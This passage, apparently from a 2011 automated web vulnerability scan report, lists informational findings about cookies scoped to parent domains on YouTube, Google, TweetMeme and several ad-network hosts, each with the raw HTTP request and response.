Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; orblb=2lfk1rn012dh10u0100000; rdrlst=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; 
sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000060o020502106ag2leqh190tkqe00d0o02050210d82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00g0o02050210f5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000020o020502102820lebnns181qq00e0l000400100b0olfjpei000000020o020502102ab4lebnns181qq00g0o02050210f9szlebnns181qq00g0o02050210f8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13kpc00f0o02050210fal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000020o020502102b08lfjpei000000020o02050210240slebnns181qq00e0l00040010045mlfdxmc000000030o020502103a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv18fgn00h0o03050310g; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Location: http://r.openx.net/set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=6ch47d7o8wtv
Content-Length: 0
Date: Tue, 25 Jan 2011 02:05:02 GMT


13.102. http://il.youtube.com/watch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://il.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
  • VISITOR_INFO1_LIVE=oSlc8a237Qg; path=/; domain=.youtube.com; expires=Wed, 21-Sep-2011 22:36:38 GMT
  • GEO=76ddae6b596d22d70649c3f298d7779ecwsAAAAzVVOtwdbzTT3+9g==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: il.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Mon, 24 Jan 2011 22:36:38 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=oSlc8a237Qg; path=/; domain=.youtube.com; expires=Wed, 21-Sep-2011 22:36:38 GMT
Set-Cookie: GEO=76ddae6b596d22d70649c3f298d7779ecwsAAAAzVVOtwdbzTT3+9g==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fil.youtube.com%2Fwatch&ytsession=9CCes4D_KlNIl7SiPulxyCata5FvenJFf1wQWKCp1FfowW4Ruca5frrRInIZHQDHadMY2zzc7eC949j37txZqBMfbtlMX76yyqg5YaUJdpArzok6qvSJGE2qJmTQ9us2_jirFmCfOuioCIHWzOYfDjeH5EK1C8wyNCA6uBNcN2zBzk-rtHd9cUnRz_cypFXxyGkfU6vqIN2wK124Rc1nHvt5kfu7275zZvGpAhvL8mAbr918TS_LFBmxlw8xwHA5YsyHQat_Or43vMW4bg-eXOa17nSCXUzcfvry5x_x-4tgaww7-soXyA
Connection: close


13.103. http://images.google.com/images

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.google.com
Path:   /images

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • PREF=ID=28805e2640abba72:FF=0:TM=1295967942:LM=1295967942:S=XgbrdIg30yELc79u; expires=Thu, 24-Jan-2013 15:05:42 GMT; path=/; domain=.google.com
  • NID=43=mcWAgK1ANMXxEaYpa4k28PPWxEgiMiXMY9JyNAZAwpdg3u-yZ4eQip59-1LTLikEZX9_Vg6M2deQCgacPaIumRuV0AAahKaZM3THMQhm32QzECiAxEpv3mwYDylZXsml; expires=Wed, 27-Jul-2011 15:05:42 GMT; path=/; domain=.google.com; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images HTTP/1.1
Host: images.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://images.google.com/imghp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=28805e2640abba72:FF=0:TM=1295967942:LM=1295967942:S=XgbrdIg30yELc79u; expires=Thu, 24-Jan-2013 15:05:42 GMT; path=/; domain=.google.com
Set-Cookie: NID=43=mcWAgK1ANMXxEaYpa4k28PPWxEgiMiXMY9JyNAZAwpdg3u-yZ4eQip59-1LTLikEZX9_Vg6M2deQCgacPaIumRuV0AAahKaZM3THMQhm32QzECiAxEpv3mwYDylZXsml; expires=Wed, 27-Jul-2011 15:05:42 GMT; path=/; domain=.google.com; HttpOnly
Date: Tue, 25 Jan 2011 15:05:42 GMT
Server: gws
Content-Length: 227
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://images.google.com/imghp">
...[SNIP]...

13.104. http://iphone.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://iphone.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=ad1cdf367a61d114c08b9bc313cec24d; expires=Tue, 01-Feb-2011 15:05:55 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: iphone.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:05:55 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=ad1cdf367a61d114c08b9bc313cec24d; expires=Tue, 01-Feb-2011 15:05:55 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0074069499969482
X-Served-In: 0.058972120285034
X-Served-By: h01
Content-Length: 42596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

13.105. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • udm_0=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; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:41 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K04491 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; 
rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:41 GMT; Path=/
Last-Modified: Mon, 24 Jan 2011 21:06:41 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 24 Jan 2011 22:06:41 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 24 Jan 2011 21:06:41 GMT
Content-Length: 5862

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'K04491';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...

13.106. http://justinbieber.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://justinbieber.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=e7b93a4f4c08aa6fe8ee06832daf5cfd; expires=Tue, 01-Feb-2011 16:26:48 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: justinbieber.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 16:26:48 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=e7b93a4f4c08aa6fe8ee06832daf5cfd; expires=Tue, 01-Feb-2011 16:26:48 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.013036966323853
X-Served-In: 0.72553992271423
X-Served-By: ded2061
Content-Length: 42518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

13.107. http://k.collective-media.net/cmadj/cm.martini/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • cli=11de1c500e0115c; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:30:36 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.martini/ HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Content-Length: 7047
Date: Tue, 25 Jan 2011 16:30:36 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 22-Feb-2011 16:30:36 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11de1c500e0115c; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:30:36 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...

13.108. http://khm0.google.com/kh/v/x3d76/x26

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khm0.google.com
Path:   /kh/v/x3d76/x26

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=a90843375ef24eb2:TM=1295973379:LM=1295973379:S=y00SfeV21WdWqUTv; expires=Thu, 24-Jan-2013 16:36:19 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d76/x26 HTTP/1.1
Host: khm0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a90843375ef24eb2:TM=1295973379:LM=1295973379:S=y00SfeV21WdWqUTv; expires=Thu, 24-Jan-2013 16:36:19 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 16:36:19 GMT
Server: btfe
Content-Length: 1368
X-XSS-Protection: 1; mode=block
Connection: close


<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

13.109. http://khm1.google.com/kh/v/x3d76/x26

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khm1.google.com
Path:   /kh/v/x3d76/x26

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=cf9e7ea08ee15b44:TM=1295973396:LM=1295973396:S=r_nSTLT0WyjGau-L; expires=Thu, 24-Jan-2013 16:36:36 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d76/x26 HTTP/1.1
Host: khm1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=cf9e7ea08ee15b44:TM=1295973396:LM=1295973396:S=r_nSTLT0WyjGau-L; expires=Thu, 24-Jan-2013 16:36:36 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 16:36:36 GMT
Server: btfe
Content-Length: 1368
X-XSS-Protection: 1; mode=block
Connection: close


<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

13.110. http://khmdb0.google.com/kh

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khmdb0.google.com
Path:   /kh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=a7f10d14c4f00411:TM=1295973412:LM=1295973412:S=4E7KVheBazHuNfU4; expires=Thu, 24-Jan-2013 16:36:52 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a7f10d14c4f00411:TM=1295973412:LM=1295973412:S=4E7KVheBazHuNfU4; expires=Thu, 24-Jan-2013 16:36:52 GMT; path=/; domain=.google.com
Date: Tue, 25 Jan 2011 16:36:52 GMT
Server: btfe
Content-Length: 1356
X-XSS-Protection: 1; mode=block
Connection: close


<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

13.111. http://khmdb1.google.com/kh

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khmdb1.google.com
Path:   /kh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=bb0c184c4092797e:TM=1295973518:LM=1295973518:S=TQ6x1q9xqq1iW1xq; expires=Thu, 24-Jan-2013 16:38:38 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=bb0c184c4092797e:TM=1295973518:LM=1295973518:S=TQ6x1q9xqq1iW1xq; expires=Thu, 24-Jan-2013 16:38:38 GMT; path=/; domain=.google.com
Date: Tue, 25 Jan 2011 16:38:38 GMT
Server: btfe
Content-Length: 1356
X-XSS-Protection: 1; mode=block
Connection: close


<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

13.112. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • C2=inePNJpwIg02FVGCdbdRlhgohXUZwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
  • GUID=MTI5NTkwMzIwMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=6bbPNJpwIg02FAHCdbdBwhgohXAcwOoAM/oBeK7YDwAoGW8r1VQcKa4qGKGBI9YBlP53FkL3Fx6gPbw6TVE0su2B/0mxdC; GUID=MTI5NTg5MDE3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 21:06:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=inePNJpwIg02FVGCdbdRlhgohXUZwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
Set-Cookie: GUID=MTI5NTkwMzIwMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 24 Jan 2011 22:06:42 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.113. http://loadus.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
  • myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; expires=Fri, 25-Mar-2011 21:06:41 GMT; path=/; domain=.exelator.com
  • BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
  • TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
  • EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
